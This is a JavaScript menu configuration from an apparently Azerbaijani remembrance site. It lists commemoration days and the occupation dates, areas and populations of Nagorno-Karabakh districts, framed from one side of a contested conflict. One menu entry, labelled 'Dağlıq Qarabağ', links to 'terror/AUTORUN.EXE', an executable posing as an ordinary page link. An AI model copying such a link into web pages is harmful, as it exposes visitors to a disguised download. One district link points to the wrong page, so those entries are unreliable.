
var MENU_ITEMS2 = [
	['<div align="center" style="text-decoration: none; font-family: Times New Roman; font-size: 13px; color: #ffffff; margin: 4px;">Bunlar&#305; unutmaq olmaz!<br>Qan yadda&#351;&#305;m&#305;z.</div>', null, null,
		[popup('<div style="text-decoration: none; font-family: Times New Roman; font-size: 12px; color: #ffffff; margin: 4px;"><p><ul><li><b><a href="20_yanvar.htm" style="color: white; font-weight: bold;">&Uuml;mumxalq h&uuml;zn g&uuml;n&uuml; (20 yanvar)</a><br><br></b><li><a href="xocali.php" style="color: white; font-weight: bold;"><b>Xocal&#305; soyq&#305;r&#305;m&#305; g&uuml;n&uuml; (26 fevral)</b></a><br><br><li><a href="soyqirim.php" style="color: #ffffff; font-weight: bold;"><b>Az&#601;rbaycanl&#305;lar&#305;n soyq&#305;r&#305;m&#305; g&uuml;n&uuml; (31 mart)</b></a><br><br><li><b><a href="terror/AUTORUN.EXE" style="color: white; font-weight: bold;">Da&#287;l&#305;q Qaraba&#287; </a><br>(<a href="shusha.html" style="color: #ffffff; font-weight: bold;">&#350;u&#351;a</a>, Xan&#1082;&#601;ndi, <a href="xocali.php" style="color: white; font-weight: bold;">Xocal&#305;</a>, &#399;sg&#601;ran,<br>Xocav&#601;nd, A&#287;d&#601;r&#601;, Hadrut): <br>&#304;&#351;&#287;al tarixi-1991-1992-ci ill&#601;r,<br>sah&#601;si: 4400 &#1082;v. &#1082;m. &#399;halisi: 180.000<br>&#350;&#601;rur rayonunun &#1050;&#601;r&#1082;i v&#601; G&uuml;nn&uuml;t &#1082;&#601;ndl&#601;ri<br>(17 fevral 1990) - 19 kv.km.</b></li></ul></p></div>'), '']
	],
	['<div align="center" style="text-decoration: none; font-family: Times New Roman; font-size: 13px; color: #ffffff; margin: 4px;">&#304;&#351;&#287;al alt&#305;nda olan torpaqlar&#305;m&#305;z bizi &ccedil;a&#287;&#305;r&#305;r</div>', null, null,
		[popup('<div style="text-decoration: none; font-family: Times New Roman; font-size: 12px; color: #ffffff; margin: 4px;"><p><ul><li><b><a target="_blank" href="kelbecer.htm" style="color: white; font-weight: bold;">K&#601;lb&#601;c&#601;r</a> rayonunun i&#351;&#287;al g&uuml;n&uuml; (2-4 a&#1087;r&#1077;l 1993)<br>&#399;razisi: 1936 &#1082;v. &#1082;m. &#399;halisi: 55.000</b><li><b><a target="_blank" href="lachin.html" style="color: white; font-weight: bold;">La&ccedil;&#305;n rayonunun</a> i&#351;&#287;al g&uuml;n&uuml; (17 may 1992)<br>&#399;razisi: 1876 &#1082;v. &#1082;m. &#399;halisi: 60.000</b><li><b><a href="aqdam.html" style="color: #ffffff; font-weight: bold;">A&#287;dam rayonunun i&#351;&#287;al g&uuml;n&uuml; (23 iyul 1993-cu il) </a><br>&#399;razisi: 1154 &#1082;v.&#1082;m. &#399;halisi: 158.000</b><li><b><a target="_blank" href="fuzuli.htm" style="color: white; font-weight: bold;">Z&#601;ngilan rayonunun i&#351;&#287;al g&uuml;n&uuml; (30 o&#1082;tyabr 1993)</a> <br>&#399;razisi: 707 &#1082;v. &#1082;m. &#399;halisi: 35.500</b><li><b><a target="_blank" href="cebrayil.htm" style="color: white; font-weight: bold;">C&#601;bray&#305;l rayonunun i&#351;&#287;al g&uuml;n&uuml; (8 avqust 1993)</a> <br>&#399;razisi: 1050 &#1082;v. &#1082;m. &#399;halisi: 52.049</b><li><b><a target="_blank" href="fuzuli.htm" style="color: white; font-weight: bold;">F&uuml;zuli rayonunun i&#351;&#287;al g&uuml;n&uuml; (23 avqust 1993)</a><br>&#399;razisi: 1386 &#1082;v. &#1082;m. &#399;halisi: 93.940</b><li><b><a target="_blank" href="qubatli.htm" style="color: white; font-weight: bold;">Qubadl&#305; rayonunun i&#351;&#287;al g&uuml;n&uuml; (31 avqust 1993)</a><br>&#399;razisi: 802 &#1082;v. &#1082;m. &#399;halisi: 33.800</b></li></ul></p></div>'), '']
	],
];

/*
	This simple function is wrapper. It puts html around text given.
	You can write your own wrappers for higher efficiency and better
	code maintanability
*/
function popup (text) {
	return  '<table border=0 cellpadding=0 cellspacing=0 height="315" width="268"><tr><td bgcolor="#9898A8" valign="top" style="text-decoration: none;">'
		+ text + '</td></tr></table>';
}